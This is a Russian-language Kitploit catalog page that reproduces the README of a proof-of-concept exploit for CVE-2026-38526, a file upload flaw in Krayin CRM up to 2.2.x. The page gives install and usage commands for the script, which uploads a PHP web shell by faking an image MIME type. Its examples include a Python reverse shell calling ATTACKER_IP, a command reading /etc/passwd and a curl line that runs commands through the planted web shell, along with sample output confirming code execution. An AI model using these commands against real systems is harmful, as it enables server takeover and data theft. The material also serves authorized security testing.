Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-CVE-2026-38526 — Автоматический эксплойт для Krayin CRM ≤ 2.2.x. | Kitploit
Инструменты/GitHubGitHub/b0nyo/poc-cve-2026-38526
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubb0nyo/poc-cve-2026-38526

PoC-CVE-2026-38526

Автоматический эксплойт для Krayin CRM ≤ 2.2.x.

Репозиторий
22 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-38526 - RCE через загрузку PHP в Krayin CRM

Автоматический эксплойт для Krayin CRM ≤ 2.2.x. Этот скрипт использует уязвимость неограниченной загрузки файлов в конечной точке TinyMCE (/admin/tinymce/upload), обходит проверку MIME-типа, подделывая image/jpeg, загружает PHP-веб-шелл и выполняет произвольные команды с привилегиями веб-сервера.


Детали уязвимости

PropertyValue
CVE IDCVE-2026-38526
Affected SoftwareKrayin CRM ≤ 2.2.x
Vulnerability TypeНеограниченная загрузка файлов → удаленное выполнение кода
AuthenticationТребуется (любая действительная учетная запись администратора)
EndpointPOST /admin/tinymce/upload

Предварительные требования

  • Python 3.7+
  • Действительные учетные данные администратора для целевого экземпляра Krayin CRM
  • Сетевой доступ к целевому приложению
  • Библиотека requests

Установка

root@kitploit:~
git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt

Использование

root@kitploit:~
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]

Аргументы

FlagDescriptionExample
-iЦелевой URL (с http:// или без)http://target.com или target.com
-uЭлектронная почта/имя пользователя администратора[email protected]
-pПароль администратораAdminPassword123!
-cКоманда для выполнения (по умолчанию: id)whoami

Примеры

root@kitploit:~
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"

# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"

# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"

Порядок эксплуатации

  1. Аутентификация: Извлечение CSRF-токена со страницы входа, аутентификация с предоставленными учетными данными
  2. Проверка сеанса: Извлечение свежего CSRF-токена из аутентифицированной панели управления
  3. Загрузка веб-шелла: Загрузка PHP-полезной нагрузки в /admin/tinymce/upload с поддельным MIME-типом
  4. Выполнение команд: Выполнение произвольных команд через GET-параметр веб-шелла

Пример вывода

root@kitploit:~
[*] Target: http://target.com
[*] Username: [email protected]

[*] Authenticating...
[+] Authentication successful

[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution

[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────

[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'

Частые проблемы

Ошибка аутентификации: Убедитесь, что учетные данные верны и учетная запись существует на целевом сервере.

Ошибка извлечения CSRF-токена: Убедитесь, что на целевом сервере работает уязвимая версия Krayin CRM и конечная точка входа доступна.

Обратная оболочка не подключается: Убедитесь, что ваш слушатель запущен (nc -lvnp <PORT>), правила брандмауэра разрешают исходящие подключения, а IP/порт в полезной нагрузке указаны верно.


Отказ от ответственности

Этот инструмент предоставляется строго для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен. Пользователи несут единоличную ответственность за получение надлежащего разрешения перед тестированием любой целевой системы. Автор не несет ответственности за неправомерное использование или ущерб, причиненный этим инструментом.


Ссылки

  • TREXNEGRO Security Advisory - CVE-2026-38526
  • Krayin CRM GitHub
  • OWASP - Неограниченная загрузка файлов

Автор

b0nyo - Реализация PoC

  • GitHub

TREXNEGRO - Обнаружение уязвимости

  • Бюллетени безопасности
Скачать инструмент